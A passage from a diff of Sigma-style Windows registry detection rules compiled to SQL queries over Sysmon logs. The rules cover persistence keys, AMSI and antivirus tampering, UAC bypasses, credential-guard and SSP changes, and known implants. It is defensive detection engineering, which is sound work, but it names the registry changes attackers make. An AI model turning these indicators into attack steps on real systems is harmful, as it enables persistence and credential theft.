"registry_event_susp_lsass_dll_load.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Software installers downloaded and used by users" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detects persistence registry keys for Recycle Bin", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137.006" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ "attack.defense_evasion", - "attack.t1070.005" + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml" + }, + { + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", + "tags": [ + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + ], + "filename": "registry_event_mal_flowcloud.yml" + }, + { + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "falsepositives": [ + "Unlikely" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": 